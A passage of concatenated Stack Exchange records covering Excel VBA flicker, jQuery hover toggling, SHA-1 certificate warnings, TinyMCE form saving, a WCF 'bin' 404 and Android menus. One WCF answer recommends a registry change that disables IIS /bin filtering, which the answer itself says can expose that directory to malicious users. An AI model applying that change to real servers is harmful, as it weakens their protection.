2.xls\").Worksheets(\"Sheet 2\")\n\n '1. Find last used row in the copy range based on data in column A\n lCopyLastRow = wsCopy.Range(\"J10:J16\").Find(what:=\"\", LookIn:=xlValues).Offset(-1).Row\n\n '2. 
Find first blank row in the destination range based on data in column A\n 'Offset property moves down 1 row\n lDestLastRow = wsDest.Cells(wsDest.Rows.Count, \"J\").End(xlUp).Offset(1).Row\n lDestLastRow2 = wsDest2.Cells(wsDest2.Rows.Count, \"A\").End(xlUp).Offset(1).Row\n\n wsCopy.Unprotect \"pass\"\n\n For i = 10 To 15\n If Range(\"W\" & i) <> \"\" And Range(\"S\" & i) = \"\" Then\n MsgBox \"please fill column S\"\n GoTo protect\n\n ElseIf Range(\"K\" & i) <> \"\" And Range(\"X\" & i) = \"\" Then\n MsgBox \"please fill column X\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"Y\" & i) = \"\" Then\n MsgBox \"please fill column Y\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AB\" & i) = \"\" Then\n MsgBox \"please fill column AB\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AA\" & i) = \"\" Then\n MsgBox \"please fill column AA\"\n GoTo protect\n\n ElseIf Range(\"W\" & i) <> \"\" And Range(\"AC\" & i) = \"\" Then\n MsgBox \"please fill column AC\"\n GoTo protect\n End If\n Next i\n\n If Range(\"W\" & 10) <> \"\" And Range(\"AD\" & 10) = \"\" Then\n MsgBox \"please fill column AD\"\n GoTo protect\n End If\n\n If WorksheetFunction.CountIf(wsDest2.Range(\"B10:B\" & lDestLastRow2 - 1), wsCopy.Range(\"B10\")) > 0 Then\n check = MsgBox(\"Double?\", _\n vbQuestion + vbYesNo, \"Double data\")\n If check = vbYes Then\n GoTo export\n Else\n GoTo protect\n End If\n Else\n GoTo export\n End If\n\n If Range(\"Q5\") <> \"\" Then\n check = MsgBox(\"sure?\", _\n vbQuestion + vbYesNo, \"Manual override\")\n If check = vbYes Then\n GoTo export\n Else\n GoTo protect\n End If\n Else\n GoTo export\n End If\n\nWith Application\n .ScreenUpdating = True\n .Calculation = xlCalculationAutomatic\nEnd With\n\nexport:\n\n '3. 
Copy & Paste Data\n For Each cell In wsCopy.Range(\"AB10:AB15\")\n cell.Value = UCase(cell.Value)\n Next cell\n\n wsDest.Rows(lDestLastRow & \":\" & lDestLastRow + lCopyLastRow - 10).Insert shift:=xlShiftDown\n wsDest.Range(\"A\" & lDestLastRow) = WorksheetFunction.Max(wsDest.Range(\"A10:A\" & lDestLastRow)) + 1\n wsDest.Range(\"L\" & lDestLastRow - 1).Copy\n wsDest.Range(\"L\" & lDestLastRow).Resize(lCopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n wsDest.Range(\"R\" & lDestLastRow - 1).Copy\n wsDest.Range(\"R\" & lDestLastRow).Resize(lCopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n wsCopy.Range(\"B10:K\" & lCopyLastRow).Copy\n wsDest.Range(\"B\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"B10:K\" & lCopyLastRow).Copy\n wsDest.Range(\"B\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"M10:Q\" & lCopyLastRow).Copy\n wsDest.Range(\"M\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n wsCopy.Range(\"S10:AF\" & lCopyLastRow).Copy\n wsDest.Range(\"S\" & lDestLastRow).PasteSpecial Paste:=xlPasteValues\n\n For Each cell In wsDest.Range(\"B\" & lDestLastRow & \":B\" & lDestLastRow + lCopyLastRow - 10)\n cell.Value = wsCopy.Range(\"B10\").Value\n Next cell\n\n 'COPY DATA for book 2 sheet 2\n wsDest2.Rows(lDestLastRow2).Insert shift:=xlShiftDown\n\n wsDest2.Range(\"A\" & lDestLastRow2) = wsDest2.Range(\"A\" & lDestLastRow2 - 1).Value + 1\n\n wsCopy.Range(\"B10:C10\").Copy\n wsDest2.Range(\"B\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"E10:Z10\").Copy\n wsDest2.Range(\"E\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"AD10:AF10\").Copy\n wsDest2.Range(\"AD\" & lDestLastRow2).PasteSpecial Paste:=xlPasteValues\n\n Dim r As Range, tabel As Range, xTabel As Range\n Dim x As Integer, xMax As Long\n 'y As Long, yMax As Long\n Dim textTabel As String\n Set tabel = wsCopy.Range(\"d10:d\" & lCopyLastRow)\n Set r = wsDest2.Range(\"d\" & lDestLastRow2)\n\n xMax = tabel.Rows.Count\n For x = 1 To xMax\n Set xTabel = tabel.Range(Cells(x, 1), Cells(x, 1))\n textTabel = Trim(xTabel.Text)\n If x = 1 Then\n textTabel = textTabel\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel = \"& \" & textTabel\n End If\n r = r & textTabel\n Next x\n\n Dim r2 As Range, tabel2 As Range, xTabel2 As Range\n Dim x2 As Integer, xMax2 As Long\n 'y As Long, yMax As Long\n Dim textTabel2 As String\n Set tabel2 = wsCopy.Range(\"AC10:AC\" & lCopyLastRow)\n Set r2 = wsDest2.Range(\"AC\" & lDestLastRow2)\n\n xMax2 = tabel2.Rows.Count\n For x2 = 1 To xMax2\n Set xTabel2 = tabel2.Range(Cells(x2, 1), Cells(x2, 1))\n textTabel2 = Trim(xTabel2.Text)\n If x2 = 1 Then\n textTabel2 = textTabel2\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel2 = \"& \" & textTabel2\n End If\n r2 = r2 & textTabel2\n Next x2\n\n Dim r3 As Range, tabel3 As Range, xTabel3 As Range\n Dim x3 As Integer, xMax3 As Long\n 'y As Long, yMax As Long\n Dim textTabel3 As String\n Set tabel3 = wsCopy.Range(\"AA10:AA\" & lCopyLastRow)\n Set r3 = wsDest2.Range(\"AA\" & lDestLastRow2)\n\n xMax3 = tabel3.Rows.Count\n For x3 = 1 To xMax3\n Set xTabel3 = tabel3.Range(Cells(x3, 1), Cells(x3, 1))\n textTabel3 = Trim(xTabel3.Text)\n If x3 = 1 Then\n textTabel3 = textTabel3\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel3 = \"& \" & textTabel3\n End If\n r3 = r3 & textTabel3\n Next x3\n\n Dim r4 As Range, tabel4 As Range, xTabel4 As Range\n Dim x4 As Integer, xMax4 As Long\n 'y As Long, yMax As Long\n Dim textTabel4 As String\n Set tabel4 = 
wsCopy.Range(\"AB10:AB\" & lCopyLastRow)\n Set r4 = wsDest2.Range(\"AB\" & lDestLastRow2)\n\n xMax4 = tabel4.Rows.Count\n For x4 = 1 To xMax4\n Set xTabel4 = tabel4.Range(Cells(x4, 1), Cells(x4, 1))\n textTabel4 = Trim(xTabel4.Text)\n If x4 = 1 Then\n textTabel4 = textTabel4\n 'r.Offset(x - 1, 0).ClearContents\n Else\n textTabel4 = \"& \" & textTabel4\n End If\n r4 = r4 & textTabel4\n Next x4\n\n 'Optional - Select the destination sheet\n wsDest.Activate\n GoTo protect\n\nprotect:\n wsCopy.protect \"pass\", _\n AllowFormattingCells:=True, _\n DrawingObjects:=True, _\n contents:=True, _\n Scenarios:=True\n\n Workbooks(\"Book 2.xls\").Save\n Exit Sub\n\nEnd Sub\n<\/code>\nI using microsoft office 2016, when i running the code is running well but still flickering. It's disturbing and I afraid it will slow process of the code.\nAny idea to stop the flickering when code is running?\nComment: I highly recommend to refactor your code and get all the `GoTo` removed and replaced by other logic. Using `GoTo` is a very bad practice and your code gets hard to maintain. Also using functions\/procedures for similar code (like your loops) would tidy up your code a lot and make it more reliable. For now it looks a bit (actually a lot) messy (sorry I have to say that).\nComment: @Shmukko did you read the title? Or the third line of the code? ;)\nComment: Have you tried Application.ScreenUpdating = False ?\nComment: @Poetoe This question might better fit to: https:\/\/codereview.stackexchange.com\nComment: @P\u1d07\u029c could you help with the code for tidy up my code? I already try to remove go to but still same problem, any idea what cause that problem?\nAnswer: You need to move this code :\n<code>With Application\n .ScreenUpdating = True\n .Calculation = xlCalculationAutomatic\nEnd With\n<\/code>\nto the end, just before <code>End Sub<\/code>\nComment: Actually Nick is right that this code is never run after a `GoTo Export` and therefore should be moved (somewhere else). But this answer is not the solution to the question. The code has a lot more issues than what Nick mentioned.\nComment: Nick is right, if none of the goto catch on, the application-screen is true and does all the export and protect part of the script with screen flickering\nComment: That's not going to solve the problem, plus there is 'Exit Sub' before 'End Sub' in his code so that won't do anything ;)\nComment: @Jo.lass Ah, well you are right! All these `GoTo` got me too confused actually. The OP should really go to https:\/\/codereview.stackexchange.com and get this whole code refactored. \u2022 But the `Exit Sub` in the end should still be removed then.\nAnswer: I could not test it but this should work:\nMy main changes explained:\n\nUnprotect the sheet as late as possible, eg right before export (so we don't need to reprotect it if we actually do not export).\nSame for <code>ScreenUpdating<\/code> and <code>Calculation<\/code> we don't need to deactivate them unless the exports start.\nI used a loop to check the columns <code>CheckColumns = Array(\"S\", \"X\", \"Y\", \"AB\", \"AA\", \"AC\")<\/code>\nI added a procedure <code>ProcessTable<\/code> that handles your multiple loops. Always use procedures to re-use the same code (istead of copying the code).\nI recommend always to activate <code>Option Explicit<\/code>: In the VBA editor go to Tools \u203a Options \u203a Require Variable Declaration.\nYou must always specify in which worksheet a <code>Range<\/code> or <code>Cells<\/code> etc. 
is otherwise Excel guesses and might be wrong.\n\n<code>Option Explicit\n\nPublic Const SHEET_PASSWORD As String = \"pass\" 'define your password here!\n\nPublic Sub ExportDataImproved()\n Dim wsCopy As Worksheet\n Set wsCopy = Workbooks(\"Book 1.xlsm\").Worksheets(\"Sheet 1\")\n\n Dim wsDest As Worksheet\n Set wsDest = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 1\")\n\n Dim wsDest2 As Worksheet\n Set wsDest2 = Workbooks(\"Book 2.xls\").Worksheets(\"Sheet 2\")\n\n Dim CopyLastRow As Long\n CopyLastRow = wsCopy.Range(\"J10:J16\").Find(what:=\"\", LookIn:=xlValues).Offset(-1).Row\n\n Dim DestNextFreeRow As Long\n DestNextFreeRow = wsDest.Cells(wsDest.Rows.Count, \"J\").End(xlUp).Offset(1).Row\n\n Dim Dest2NextFreeRow As Long\n Dest2NextFreeRow = wsDest2.Cells(wsDest2.Rows.Count, \"A\").End(xlUp).Offset(1).Row\n\n 'Perform some checks \u2026\n Dim CheckColumns() As String\n CheckColumns = Array(\"S\", \"X\", \"Y\", \"AB\", \"AA\", \"AC\")\n\n Dim CheckColumn As Variant\n Dim iRow As Long\n For iRow = 10 To 15\n If wsCopy.Cells(iRow, \"W\").Value <> vbNullString Then\n For Each CheckColumn In CheckColumns\n If wsCopy.Cells(iRow, CheckColumn).Value = vbNullString Then\n MsgBox \"Please fill column \" & CheckColumn, vbExclamation\n 'probably Exit Sub here if this should cancel the export\n End If\n Exit For\n Next CheckColumn\n End If\n Next iRow\n\n If wsCopy.Cells(10, \"W\").Value <> vbNullString And wsCopy.Cells(10, \"AD\").Value = vbNullString Then\n MsgBox \"Please fill column \" & CheckColumn, vbExclamation\n 'probably Exit Sub here if this should cancel the export\n End If\n\n If WorksheetFunction.CountIf(wsDest2.Range(\"B10:B\" & Dest2NextFreeRow - 1), wsCopy.Range(\"B10\")) > 0 Then\n If MsgBox(\"Double?\", vbQuestion + vbYesNo, \"Double data\") <> vbYes Then\n Exit Sub\n End If\n ElseIf wsCopy.Range(\"Q5\").Value <> vbNullString Then\n If MsgBox(\"Sure?\", vbQuestion + vbYesNo, \"Manual override\") <> vbYes Then\n Exit Sub\n End If\n End If\n\n 'Export starts now \u2026\n Application.ScreenUpdating = False\n Application.Calculation = xlManual 'sometimes excel calculates values before saving files\n\n wsCopy.Unprotect SHEET_PASSWORD\n On Error GoTo REPROTECT 'In case of an error make sure the sheet is not left unprotected\n\n Dim Cell As Range\n For Each Cell In wsCopy.Range(\"AB10:AB15\")\n Cell.Value = UCase$(Cell.Value)\n Next Cell\n\n wsDest.Rows(DestNextFreeRow & \":\" & DestNextFreeRow + CopyLastRow - 10).Insert shift:=xlShiftDown\n wsDest.Range(\"A\" & DestNextFreeRow) = WorksheetFunction.Max(wsDest.Range(\"A10:A\" & DestNextFreeRow)) + 1\n\n wsDest.Range(\"L\" & DestNextFreeRow - 1).Copy\n wsDest.Range(\"L\" & DestNextFreeRow).Resize(CopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n\n wsDest.Range(\"R\" & DestNextFreeRow - 1).Copy\n wsDest.Range(\"R\" & DestNextFreeRow).Resize(CopyLastRow - 9, 1).PasteSpecial Paste:=xlPasteFormulas\n\n wsCopy.Range(\"B10:K\" & CopyLastRow).Copy\n wsDest.Range(\"B\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"B10:K\" & CopyLastRow).Copy\n wsDest.Range(\"B\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"M10:Q\" & CopyLastRow).Copy\n wsDest.Range(\"M\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"S10:AF\" & CopyLastRow).Copy\n wsDest.Range(\"S\" & DestNextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n For Each Cell In wsDest.Range(\"B\" & DestNextFreeRow & \":B\" & DestNextFreeRow + CopyLastRow - 10)\n Cell.Value = wsCopy.Range(\"B10\").Value\n Next Cell\n\n 
'Copy data for wsDest2\n wsDest2.Rows(Dest2NextFreeRow).Insert shift:=xlShiftDown\n wsDest2.Range(\"A\" & Dest2NextFreeRow) = wsDest2.Range(\"A\" & Dest2NextFreeRow - 1).Value + 1\n\n wsCopy.Range(\"B10:C10\").Copy\n wsDest2.Range(\"B\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"E10:Z10\").Copy\n wsDest2.Range(\"E\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n wsCopy.Range(\"AD10:AF10\").Copy\n wsDest2.Range(\"AD\" & Dest2NextFreeRow).PasteSpecial Paste:=xlPasteValues\n\n ProcessTable wsCopy.Range(\"D10:D\" & CopyLastRow), wsDest2.Range(\"D\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AC10:AC\" & CopyLastRow), wsDest2.Range(\"AC\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AA10:AA\" & CopyLastRow), wsDest2.Range(\"AA\" & Dest2NextFreeRow)\n ProcessTable wsCopy.Range(\"AB10:AB\" & CopyLastRow), wsDest2.Range(\"AB\" & Dest2NextFreeRow)\n\n wsDest.Activate\n wsDest.Parent.Save 'save book 2\n\n 'no exit sub here!\nREPROTECT:\n wsCopy.protect SHEET_PASSWORD, _\n AllowFormattingCells:=True, _\n DrawingObjects:=True, _\n contents:=True, _\n Scenarios:=True\n\n Application.ScreenUpdating = True\n Application.Calculation = xlCalculationAutomatic\n\n 'Rise the actual error if one occurs\n If Err.Number <> 0 Then\n Err.Raise Err.Number, Err.Source, Err.Description, Err.HelpFile, Err.HelpContext\n End If\nEnd Sub\n\nPrivate Sub ProcessTable(ByVal TableRange As Range, ByVal ResultRange As Range)\n Dim TextTable As String\n\n Dim iRow As Long\n For iRow = 1 To TableRange.Rows.Count\n TextTable = TextTable & IIf(iRow = 1, vbNullString, \"& \") & Trim$(TableRange.Cells(iRow, 1).Text)\n Next iRow\n\n ResultRange.Value = ResultRange.Value & TextTable\nEnd Sub\n<\/code>\n","meta":{"source":"stackoverflow","title":"Excel ScreenUpdating false and still flickering on Copy Paste to another worksheet","dup_signals":{}},"subset":"stackexchange"} +{"text":"display on hover of div stops working after running script toggle\n\nQuestion: I'm trying to make a div <code>lolcake<\/code> appear in another <code>panel_toggle1<\/code> div either:\n\nwhen mouse hovers over another div <code>panel_toggle1<\/code> \nor toggles on and off each click on the <code>panel_toggle1<\/code> click\n\nhttp:\/\/jsfiddle.net\/Fa7Ct\/ \nhover works fine, but when I click on the <code>panel_toggle1<\/code> and back, the hover stops working. Why is that?\n[EDITED] script (NOTE: some code is removed from this script to make it easier to read - and yes the problem still occurs):\n<code>$(document).ready(function () {\n var toggle_height1 = false;\n $(\"#panel_toggle1\").click(function () {\n\n toggle_height1 = !toggle_height1;\n\n if (toggle_height1 == true) {\n $('.lolcake').css(\"display\", \"block\");\n } else {\n $('.lolcake').css(\"display\", \"none\");\n }\n });\n});\n<\/code>\nworking CSS:\n<code>.lolcake\n{\n display: none;\n}\n\n#panel_toggle1:hover .lolcake\n{\n display: block;\n}\n<\/code>\n(if needed) aspx\n<code><!-- GAME1 PANEL TOGGLE -->\n <div id=\"panel_toggle1\">\n <div class=\"lolcake\" style=\"position:absolute\">text<\/div><img src=\"images\/image.png\" alt=\"\"\/>\n <\/div>\n<\/code>\nI've used other functions like <code>toggle()<\/code> and <code>show()<\/code> <code>hide()<\/code>, but all have the same effect.\nComment: You could include all the elements that appear in your JS into your aspx(html) code, so we could recreate the problem in order to analyze it. 
Or you could just paste a jsFiddle link.\nComment: exactly, to figure out what is wrong we need all the elements in your code. for example $(\"#panel1\").slideToggle(\"slow\");\n $(\"#container-right\").animate() now where is #panel and #container-right div's??\nComment: I've added a fibble if this helps!\nAnswer: add this to your css\n<code>#panel_toggle1:hover .lolcake\n{\ndisplay: block !important;\n}\n<\/code>\nComment: sorry this doesn't really solve my problem. I'm aiming for a solution that will allow me to toggle via hover **and** clicking (problem is hover over the `panel_toggle1` stops working, button works fine)\nComment: Amazing, exactly what I wanted :)! Thx!!\n","meta":{"source":"stackoverflow","title":"display on hover of div stops working after running script toggle","dup_signals":{}},"subset":"stackexchange"} +{"text":"Browser response to SHA1 signed cert\n\nQuestion: Generated a IIS server certificate using my domain certificate authority (presumed to be an intermediate to the 'secret' root CA) via the Server Certificates -> Create Domain Certificate 'wizard'. Entered the FQDN of my server for the common name, filled out remaining form and hit Finish. Certificate is generated and shows up as a valid cert Issued by MYDOMAIN.FQDN and Issued to MYSERVER.FQDN. I changed the binding for 443 to use this new cert.\nWhen I visit the site using:\nChrome - It doesn't give me the 'untrusted popup' but it does put a red line through the HTTPS part of the URL and when i check the details it says: \"This site uses a weak security config SHA-1 so your connection may not be private\"... I check the details of the certificate and it is indeed the same TLS 1.0 cert i had just enabled and I do see our MYDOMAIN.FQDN as a trusted intermediate certificate in the Chrome -> certificates menu.\nFirefox - It gives me the popup saying \"can't confirm that your connection is secure\"... \"The certificate is not trusted because the issuer certificate is unknown\"... so I look for the MYDOMAIN.FQDN in Firefox's certificate menu and it's nowhere to be seen.\nIE - Lets me right through and I do see MYDOMAIN.FQDN as a trusted intermediate certificate authority.\nQuestions:\n\nWhy doesn't Firefox recognize MYDOMAIN.FQDN as a trusted intermediate certificate... shouldn't this be stored at the OS level (and as a member of the domain apply to all browsers?)\nI fully understand the risk of using SHA1 and the discovered vulnerabilities... is Google just trying to push people out of using SHA1 by putting the (very visible) red line through the URL?\nIs there a setting somewhere in my domain certificate authority that will default to SHA2 or better signature hashs as I didn't see an option for hash algorithm in the \"Create Domain Certificate\" wizard. I'm guessing I could go through the Create Cert Request -> Issuance in two steps and specify the hash algorithm.\n\nThanks!\nAnswer: To answer the first two bullet points:\n\nFirefox has its own list of trusted CAs. You can add certificates in Menu Button>Options>Advanced>Certificates(tab)>View Certificates>Authorities(tab).\nThis is for Firefox version 38.\nYes Google is trying to shame people into moving from SHA1 to a more secure hash such as SHA2. Here is the chromium blog post about it. 
Also see the note at the bottom about SHA1 in root certs being treated differently than SHA1 in intermediate certs.\n\nedit: I came across some official Microsoft documentation for using SHA-2 on subordinate CAs so I will include it in my answer.\n\nConfiguring Subordinate CAs for SHA-2\nThe hash chosen on the root CA determines how the Subordinate CA's certificate is signed, regardless of the CSP\/KSP and hash is chosen during the subordinate CA's install (and requested in the subordinate CA's certificate request). The requested hash in the certificate request will be ignored and the values in the registry on the parent CA will prevail. \nDuring the Subordinate CA install, the hash algorithm you select under the Select the hash algorithm for signing certificates used by this CA determines how the certificates and CRLs issued by the Subordinate CA are signed. These values can also be changed using the registry keys indicated above and will apply after a restart of ADCS. \nTo summarize, by default, the hash algorithm selected during a root CA's install will determine the hash used to sign the root CA's own certificate and all certificates and CRLs that it issues (although you can change the signing algorithm using the registry changes after the root CA certificate is generated). Subordinate CA's own certificate will be signed by the hash indicated during the root CA's install. The certificates issued by the Subordinate CA will be signed by the hash selected during the Subordinate CA's install. All selected ciphers used for signing issue certificates and CRLs can be changed in the registry, and after restarting ADCS, will apply to all future issued certificates and CRLs. \nIt's also important to note that the certificate template version or the client requesting the certificate has no impact on whether or not the CA signs with a particular hash. The hash used to sign digital certificates is determined by the fields and values listed above. \nComment: I don't have much experience with IIS, but a quick google revealed a tutorial for generating a SHA256 cert. It requires installing openSSL instead of doing everything through IIS. I haven't verified it myself so I'm not including it in my answer. Here is the link: http:\/\/dotnetstock.com\/technical\/how-to-generate-a-sha256-certificate-and-how-to-install-sha256-certificate-in-iis\/\nComment: *\"Google is trying to shame people into moving from SHA1\"* ... still using SHA-1 on their own infrastructure (with a short life span, to avoid their own warning)\n","meta":{"source":"security.stackexchange","title":"Browser response to SHA1 signed cert","dup_signals":{}},"subset":"stackexchange"} +{"text":"TinyMCE isn't allowing MVC Controller to receive updated HTML\/Text when POST through jQuery \"$.post(...)\"\n\nQuestion: I'm not sure I understand what is happening at the moment. 
I have view with information on it that calls a Modal popup, this contains a <code>TextArea<\/code> with a class of <code>editHtml<\/code>, this class will trigger my TinyMCE editor to initiate.\nModal MyView.cshtml:\n<code>@model x.Models.Content.Elements.ElementHtml\n\n@Html.Partial(\"_Tools\") \/\/This calls the TinyMCE in the next code window\n\n@using (Ajax.BeginForm(\"_Edit\", \"ElementHtmls\", \n new AjaxOptions\n {\n HttpMethod = \"POST\",\n OnSuccess = \"alert('Updated');\",\n OnFailure = \"alert('Failed');\",\n UpdateTargetId = \"ElementUpdated_\" + Model.Oid.ToString()\n },\n new { id = \"ElementForm_\" + Model.Oid.ToString() }\n))\n {\n @Html.AntiForgeryToken()\n\n <div class=\"form-horizontal\">\n <h4>ElementHtml<\/h4>\n <p>This: email@example.com()<\/p>\n <hr \/>\n @Html.ValidationSummary(true, \"\", new { @class = \"text-danger\" })\n @Html.HiddenFor(model => model.Oid)\n @Html.HiddenFor(model => model.Name)\n\n <div class=\"form-group\">\n @*@Html.LabelFor(model => model.Html, htmlAttributes: new { @class = \"control-label col-md-2\" })*@\n <div class=\"col-md-12\">\n\n \/\/This is the editHtml\n \/\/---\n @Html.EditorFor(model => model.Html, new \n { htmlAttributes = new { @class = \"form-control edithtml\" } }\n )\n \/\/---\n\n @Html.ValidationMessageFor(model => model.Html, \"\", new { @class = \"text-danger\" })\n <\/div>\n <\/div>\n\n <div class=\"form-group\">\n <div class=\"col-md-offset-2 col-md-10\">\n <input type=\"submit\" value=\"Save\" class=\"btn btn-default\" \/>\n <\/div>\n <\/div>\n <\/div>\n}\n<\/code>\nJavaScript for TinyMCE:\n<code>@Scripts.Render(\"~\/Scripts\/tinymce\/jquery.tinymce.min.js\")\n@Scripts.Render(\"~\/Scripts\/tinymce\/tinymce.min.js\")\n\n<script type=\"text\/javascript\">\n tinymce.init({\n selector: 'textarea.edithtml',\n branding: false,\n height: 250,\n menubar: false,\n plugins: [\n 'advlist autolink lists link image charmap print preview anchor',\n 'searchreplace visualblocks code fullscreen',\n 'insertdatetime media table contextmenu paste code',\n 'code'\n ],\n toolbar: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image | code',\n content_css: \"\/Content\/bootstrap.css\"\n });\n<\/script>\n<\/code>\nOn Save of the Model, I have the following javascript:\n<code>\/\/...\n$(dialog).dialog({\n title: title,\n \/\/...\n buttons: {\n 'Save': function () {\n var editForm = $(form);\n if (editForm.valid()) {\n\n $.post(editForm.attr('action'), editForm.serialize(), function (data) {\n if (data.Error != undefined && data.Error != '') {\n console.log(\"Data error: \" + data.Error);\n }\n else {\n $(dialog).dialog('close');\n }\n });\n\n }\n },\n\n 'Cancel': function () {\n $(this).dialog('close');\n }\n }\n});\n\n\/\/...\n<\/code>\nIn my code above, I have a Save on the Modal window, this will trigger JQuery's <code>'Save': function () {<\/code>, but also notice that I have a Save button on my cshtml (for testing), this is not what I would like to use, however, note that this Save button does work with the <code>edithtml<\/code> applied. Not sure if this information helps, both submit to the same Controller.\nEverything in the above code sample works properly when <code>edithtml<\/code> is NOT in the @Class, the Controller has the ViewModel, but the property of <code>Html<\/code> is the original value where I want the updated value of course. 
Other views with <code>edithtml<\/code> (not being in the Modal) work properly with the TinyMCE applied.\nDo I need to tell TinyMCE something during init or customize this section (<code>$.post(editForm.attr('action'), editForm.serialize(), function (data) {<\/code>)?\nAny information or feedback is appreciated.\nAnswer: Turns out that TinyMCE is not directly editing the TextArea, adding <code>tinyMCE.triggerSave();<\/code> before doing anything with the form in JavaScript.\nFirst answer with updated code:\n<code>\/\/...\n$(dialog).dialog({\n title: title,\n \/\/...\n buttons: {\n 'Save': function () {\n tinyMCE.triggerSave(); \/\/ <---- Added this to \"save\" to the TextArea\n var editForm = $(form);\n if (editForm.valid()) {\n\n $.post(editForm.attr('action'), editForm.serialize(), function (data) {\n if (data.Error != undefined && data.Error != '') {\n console.log(\"Data error: \" + data.Error);\n }\n else {\n $(dialog).dialog('close');\n }\n });\n\n }\n },\n\n 'Cancel': function () {\n $(this).dialog('close');\n }\n }\n});\n\n\/\/...\n<\/code>\nSecond answer, much more automatic...\nAfter taking a step further, I was able to avoid changing the above code and adding a <code>blur<\/code> event to the tinyMCE.init:\n<code>tinyMCE.init({\n selector: 'textarea.edithtml',\n branding: false,\n height: 250,\n menubar: false,\n plugins: [\n 'advlist autolink lists link image charmap print preview anchor',\n 'searchreplace visualblocks code fullscreen',\n 'insertdatetime media table contextmenu paste code',\n 'code'\n ],\n toolbar: 'undo redo | insert | styleselect | bold italic | alignleft aligncenter alignright alignjustify | bullist numlist outdent indent | link image | code',\n content_css: \"\/Content\/bootstrap.css\",\n\n \/\/Added the following (removing the .log once tested properly)\n init_instance_callback: function (editor) {\n editor.on('blur', function (e) {\n console.log('Editor was blurred!');\n tinyMCE.triggerSave();\n });\n }\n\n});\n<\/code>\n","meta":{"source":"stackoverflow","title":"TinyMCE isn't allowing MVC Controller to receive updated HTML\/Text when POST through jQuery \"$.post(...)\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to pass \"bin\" as a GET parameter in WCF without receiving 404\n\nQuestion: I have a .NET 4.0 WCF service that accepts GET requests.\nThe URL to access it looks like \nhttps:\/\/api.mysite.com\/MyService.svc\/FunctionName\/Param1\/Param2\/Param3\nWhen Param3 is the word \"bin\" I get a 404\nThis is strange because if the WCF is malformed it shows me a \"Endpoint not found\" error\nI realized it only did this when passing in \"bin\" as any of the params\nHow can I accept this word without it first looking for a physical path and replying with a 404 ?\nComment: This happens passing `bin` as *any* parameter or just the 3rd? If it's the latter than it's more likely an endpoint mapping issue rather than the use of `bin`.\nComment: passing bin as any of the GET params\nComment: Could you post the code?\nComment: No, I can't and its too much to make generic. To fix the issue I determined if bin is one of the params and then added %20 to it like '%20bin' since I know its trimmed on the other side.\nComment: The reason I asked for sample code was because I was interested to know if `bin` was an endpoint issue or something related to what you were doing in the call. For example, does your endpoint get hit and then it returns a 404? Or does it not hit your code at all?\nAnswer: I found an old article for IIS 6.0. 
Maybe it's still working: StopBinFiltering\nSetting the \n\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\ASP.NET\\\n\nregistry key can allow a malicious user access to programs and content in the \/bin directory.\nTo disable \/bin filtering:\n\nIn the details pane, right-click, point to New, and click DWORD Value.\nIn the Name box, type the following: StopBinFiltering.\nDouble-click the StopBinFiltering value, and in the Value data box type 1.\nClick OK, and then close Registry Editor.\nTo reenable \/bin filtering, set the StopBinFiltering value to 0.\n\nGood luck\n","meta":{"source":"stackoverflow","title":"How to pass \"bin\" as a GET parameter in WCF without receiving 404","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sliding Menu in android\n\nQuestion: I am using a sliding menu but it is working only for a device with a device higher than 3.0.\nI want to run the same code using defferent versions of android . Can anyone help me to find solution ??\nHere is my code\n<code>public class WelcomeActivity extends Activity {\nprivate DrawerLayout mDrawerLayout;\nprivate ListView mDrawerList;\nprivate ActionBarDrawerToggle mDrawerToggle;\nprivate CharSequence mDrawerTitle;\nprivate CharSequence mTitle;\nprivate String[] navMenuTitles;\nprivate TypedArray navMenuIcons;\nprivate ArrayList<NavDrawerItem> navDrawerItems;\nprivate NavDrawerListAdapter adapter;\n@SuppressLint(\"NewApi\")\n@Override\nprotected void onCreate(Bundle savedInstanceState) {\n super.onCreate(savedInstanceState);\n setContentView(R.layout.activity_welcome);\n mTitle = mDrawerTitle = getTitle();\n navMenuTitles = getResources().getStringArray(R.array.nav_drawer_items);\n navMenuIcons = getResources().obtainTypedArray(R.array.nav_drawer_icons);\n mDrawerLayout = (DrawerLayout) findViewById(R.id.drawer_layout);\n mDrawerList = (ListView) findViewById(R.id.list_slidermenu);\n navDrawerItems = new ArrayList<NavDrawerItem>();\n navDrawerItems.add(new NavDrawerItem(navMenuTitles[0],navMenuIcons.getResourceId(0, -1)));\nnavDrawerItems.add(new NavDrawerItem(navMenuTitles[1], navMenuIcons.getResourceId(1, -1)));\nnavDrawerItems.add(new NavDrawerItem(navMenuTitles[2], navMenuIcons.getResourceId(2, -1)));\nnavMenuIcons.recycle();\n mDrawerList.setOnItemClickListener(new SlideMenuClickListener());\n adapter = new NavDrawerListAdapter(getApplicationContext(),navDrawerItems);\n 